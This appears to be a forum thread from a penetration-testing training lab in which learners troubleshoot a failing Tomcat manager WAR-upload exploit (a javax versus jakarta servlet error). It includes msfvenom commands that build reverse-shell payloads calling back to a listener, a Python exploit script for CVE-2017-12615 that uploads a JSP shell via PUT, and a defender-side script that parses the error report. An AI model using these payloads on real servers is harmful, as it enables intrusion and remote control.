The Live Engagement Host #1

Hi, I was wondering if someone can tell me what I am doing wrong in the lab.

What I am doing is the following. I started a shell on the host that we have RDP access to. I upgraded the shell to a meterpreter session with msfconsole.
I completed host 2 and 3 through my own local machine within msfconsole through run autoroute 172.16.1.0/23

For Host 1 I need to get a tomcat vulnerability for the mgr upload. I have set up the exploit and the handler, but msfconsole hangs on executing …
When I log in manually through the webpage I can see the payload is uploaded, but I never get a response back from the machine.
After a few minutes msfconsole times out.

If I run msfconsole on the RDP machine it instantly breaks after executing the upload.

When I enable httptrace in metasploit I get the following response during the exploit:

[*] Executing EmRX9zHIfRN729ts…
####################

Request:

####################
GET /EmRX9zHIfRN729ts/jbVbamUcgsWMAiQAkbBXavD.jsp HTTP/1.1
Host: 172.16.1.11:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15

####################

Response:

####################
HTTP/1.1 500
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 5671
Date: Sun, 08 Jan 2023 21:53:58 GMT
Connection: close

HTTP Status 500 – Internal Server Error


Type Exception Report

Message Error instantiating servlet class [metasploit.PayloadServlet]

Description The server encountered an unexpected condition that prevented it from fulfilling the request.

Exception

jakarta.servlet.ServletException: Error instantiating servlet class [metasploit.PayloadServlet]
org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)
org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)
org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)
org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)
org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)
org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)
org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
java.lang.Thread.run(Unknown Source)

Root Cause

java.lang.NoClassDefFoundError: javax/servlet/http/HttpServlet
java.lang.ClassLoader.defineClass1(Native Method)
java.lang.ClassLoader.defineClass(Unknown Source)
java.security.SecureClassLoader.defineClass(Unknown Source)
org.apache.catalina.loader.WebappClassLoaderBase.findClassInternal(WebappClassLoaderBase.java:2516)
org.apache.catalina.loader.WebappClassLoaderBase.findClass(WebappClassLoaderBase.java:872)
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1408)
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)
org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)
org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)
org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)
org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)
org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)
org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)
org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
java.lang.Thread.run(Unknown Source)

Root Cause

java.lang.ClassNotFoundException: javax.servlet.http.HttpServlet
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1444)
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)
java.lang.ClassLoader.defineClass1(Native Method)
java.lang.ClassLoader.defineClass(Unknown Source)
java.security.SecureClassLoader.defineClass(Unknown Source)
org.apache.catalina.loader.WebappClassLoaderBase.findClassInternal(WebappClassLoaderBase.java:2516)
org.apache.catalina.loader.WebappClassLoaderBase.findClass(WebappClassLoaderBase.java:872)
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1408)
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)
org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)
org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)
org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)
org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)
org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)
org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)
org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
java.lang.Thread.run(Unknown Source)

Note The full stack trace of the root cause is available in the server logs.


Apache Tomcat/10.0.11

[-] Exploit aborted due to failure: unknown: Failed to execute the payload
[*] Exploit completed, but no session was created.
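
A defender-side triage of the error report quoted above, as an added example that is not part of the original posts: it pulls the failing servlet class, the missing classes and the Tomcat major version out of the report and turns them into findings. The sample text is constructed from the lines shown in the thread, and the function and finding names are hypothetical.

```python
import re

# Constructed sample: the error report from the thread, condensed to its key lines.
SAMPLE_REPORT = """\
HTTP Status 500 – Internal Server Error
Message Error instantiating servlet class [metasploit.PayloadServlet]
jakarta.servlet.ServletException: Error instantiating servlet class [metasploit.PayloadServlet]
Root Cause
java.lang.NoClassDefFoundError: javax/servlet/http/HttpServlet
Root Cause
java.lang.ClassNotFoundException: javax.servlet.http.HttpServlet
Apache Tomcat/10.0.11
"""

SERVLET_RE = re.compile(r"Error instantiating servlet class \[([\w.$]+)\]")
MISSING_RE = re.compile(
    r"^\s*java\.lang\.(?:NoClassDefFoundError|ClassNotFoundException): (\S+)", re.M)
VERSION_RE = re.compile(r"Apache Tomcat/(\d+)\.")


def triage_error_report(report: str) -> dict:
    """Extract the failing servlet, missing classes and Tomcat major version,
    then derive findings a responder can act on (hypothetical finding names)."""
    servlet = SERVLET_RE.search(report)
    version = VERSION_RE.search(report)
    # NoClassDefFoundError uses slashes, ClassNotFoundException dots: normalise.
    missing = sorted({m.group(1).replace("/", ".") for m in MISSING_RE.finditer(report)})
    result = {
        "servlet_class": servlet.group(1) if servlet else None,
        "missing_classes": missing,
        "tomcat_major": int(version.group(1)) if version else None,
        "findings": [],
    }
    if result["servlet_class"] and result["servlet_class"].startswith("metasploit."):
        # The class was found inside a deployed WAR, so the upload itself succeeded.
        result["findings"].append("metasploit-war-deployed")
    if (result["tomcat_major"] or 0) >= 10 and any(
            c.startswith("javax.servlet.") for c in missing):
        # Tomcat 10 ships jakarta.servlet.*; code built against javax.servlet.* cannot load.
        result["findings"].append("javax-servlet-class-on-jakarta-container")
    return result


if __name__ == "__main__":
    print(triage_error_report(SAMPLE_REPORT))
```

The 500 is not a clean failure from the server's point of view: the servlet class was located inside an unpacked WAR, so the manager credentials used for the deploy and the deployed context both need attention.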

I have been suffering from a similar phenomenon for about a week.
I created a WAR file with msfvenom and uploaded/deployed it.

$ msfvenom -p java/shell_reverse_tcp lhost=172.16.1.5 lport=4444 -f war -o pwn.war
Payload size: 13322 bytes
Final size of war file: 13322 bytes
Saved as: pwn.war

However, when I click on it, I get the same error.
How can I eliminate this error and establish a session?

HTTP Status 500 – Internal Server Error

Type Exception Report

Message Error instantiating servlet class [metasploit.PayloadServlet]

Description The server encountered an unexpected condition that prevented it from fulfilling the request.

Exception

jakarta.servlet.ServletException: Error instantiating servlet class [metasploit.PayloadServlet]
	org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)
	org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
	org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
	org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)
	org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)
	org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
	org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)
	org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)
	org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
	org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)
	org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
	org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
	java.lang.Thread.run(Unknown Source)

Root Cause

java.lang.NoClassDefFoundError: javax/servlet/http/HttpServlet
	java.lang.ClassLoader.defineClass1(Native Method)
	java.lang.ClassLoader.defineClass(Unknown Source)
	java.security.SecureClassLoader.defineClass(Unknown Source)
	org.apache.catalina.loader.WebappClassLoaderBase.findClassInternal(WebappClassLoaderBase.java:2516)
	org.apache.catalina.loader.WebappClassLoaderBase.findClass(WebappClassLoaderBase.java:872)
	org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1408)
	org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)
	org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)
	org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
	org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
	org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)
	org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)
	org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
	org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)
	org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)
	org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
	org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)
	org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
	org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
	java.lang.Thread.run(Unknown Source)

Root Cause

java.lang.ClassNotFoundException: javax.servlet.http.HttpServlet
	org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1444)
	org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)
	java.lang.ClassLoader.defineClass1(Native Method)
	java.lang.ClassLoader.defineClass(Unknown Source)
	java.security.SecureClassLoader.defineClass(Unknown Source)
	org.apache.catalina.loader.WebappClassLoaderBase.findClassInternal(WebappClassLoaderBase.java:2516)
	org.apache.catalina.loader.WebappClassLoaderBase.findClass(WebappClassLoaderBase.java:872)
	org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1408)
	org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)
	org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)
	org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
	org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
	org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)
	org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)
	org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
	org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)
	org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)
	org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
	org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)
	org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
	org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
	java.lang.Thread.run(Unknown Source)

Note The full stack trace of the root cause is available in the server logs.

I managed to do it after all; I did all the steps manually.
If you get the same error as I did, or if it tries to connect constantly, do all the steps manually; don't rely on msfconsole.

How??

Where are you stuck?

I could solve it in a manual way. I guess the problem was with my payload generated with msfvenom: instead of using -f war, for some reason I made a typo and was using “raw”.

I’m trying another method to see if it works, exploiting the vuln Apache Tomcat JSP Upload Remote Code Execution (CVE-2017-12615). I wrote some Python code to exploit it, but I keep getting HTTP 405. If anyone else wants to give it a try, here’s my code:

#!/usr/bin/env python3

import http.client
import os

target_ip = "172.16.1.11"
target_port = 8080

# Generate the JSP payload with msfvenom and write it to shell.jsp
print("\033[92mGenerating JSP reverse shell\033[0m")
os.system("msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=4444 -f raw > shell.jsp")

# Read the generated file as the request body
try:
    with open("shell.jsp", "rb") as f:
        body = f.read()
except FileNotFoundError:
    print("\033[91mError: shell.jsp not found\033[0m")
    exit()
except Exception as e:
    print("\033[91mError:", str(e), "\033[0m")
    exit()

conn = http.client.HTTPConnection(target_ip, target_port)

headers = {"Host": "{}:{}".format(target_ip, target_port),
           "Accept-Language": "en",
           "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
           "Connection": "close",
           "Content-Type": "application/x-www-form-urlencoded"}

# PUT the file, then request it only if the server reports it was stored
try:
    conn.request("PUT", "/shell.jsp", body, headers)
    r1 = conn.getresponse()
    print("\033[92m", r1.status, r1.reason, "\033[0m")
    if r1.status == 204 or r1.status == 201:
        conn.request("GET", "/shell.jsp")
        r2 = conn.getresponse()
        print("\033[92m", r2.status, r2.reason, "\033[0m")
except Exception as e:
    print("\033[91mError:", str(e), "\033[0m")